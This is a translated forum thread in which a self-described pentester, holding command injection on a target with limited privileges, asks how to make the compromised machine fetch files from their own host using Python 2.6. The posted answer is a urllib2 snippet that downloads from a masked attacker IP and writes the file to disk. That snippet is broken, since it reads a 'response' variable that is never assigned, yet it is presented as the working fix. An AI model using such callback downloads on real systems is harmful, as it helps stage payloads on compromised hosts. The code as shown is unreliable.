我正在尋找一些Python腳本的幫助。Python26腳本從遠程主機抓取文件
我正在做一個pentesting項目,並獲得了進入命令注入和編寫文件在系統wwwroot目錄與有限privs的權限。 ftp和telnet都在系統上,但我沒有權限給他們。在這一點上真正有用的一件事是在系統上可以使用的Python26。儘管我擁有最小的真實生活Python知識。
我的想法是...有沒有一種方法可以使用Python腳本回調我的主機,並從我的主機中獲取文件?如果是這樣,有沒有人有任何關於如何編寫腳本的指針?
在此先感謝。
import urllib2
file = "success2.txt"
url = "http://xx.xx.xx.xx/test.txt"
fh = open(file, "w")
fh.write(response.read())
fh.close()
所以這就是我在@ furas的建議後最終做了什麼。
我做更多的研究,結果發現: http://www.pythonforbeginners.com/python-on-the-web/how-to-use-urllib2-in-python/
這說明它非常好。
希望這可以幫助未來的人。
據我瞭解的代碼。 你先設置變量「文件」,這是你會寫什麼(絕對路徑可能無關緊要的遙控器使用) 然後你設定的文件所在的URL和文件名
然後代碼文件寫至。然後它將從URL中打開的文件寫入。
與ftp不同,這似乎並不直接「複製」文件。因此,您可能需要在fh = open(文件,「w」)中使用「wb」來完成二進制操作。我不是w和wb之間的差異,但是這種方法對我有用。
如果您的主機上有開放端口(例如安裝了FTP,WWW等的服務器),則外部計算機可以連接到您的主機。但它可能取決於遠程主機和主機之間所有路由器的配置。你可以找到許多教程如何使用Python來連接到FTP,WWW甚至是MAIL。 – furas
謝謝,我認爲,因爲我沒有使用perm在賬戶上使用ftp,所以我不能以這種方式使用python? –
雖然我會更多地關注www方向 –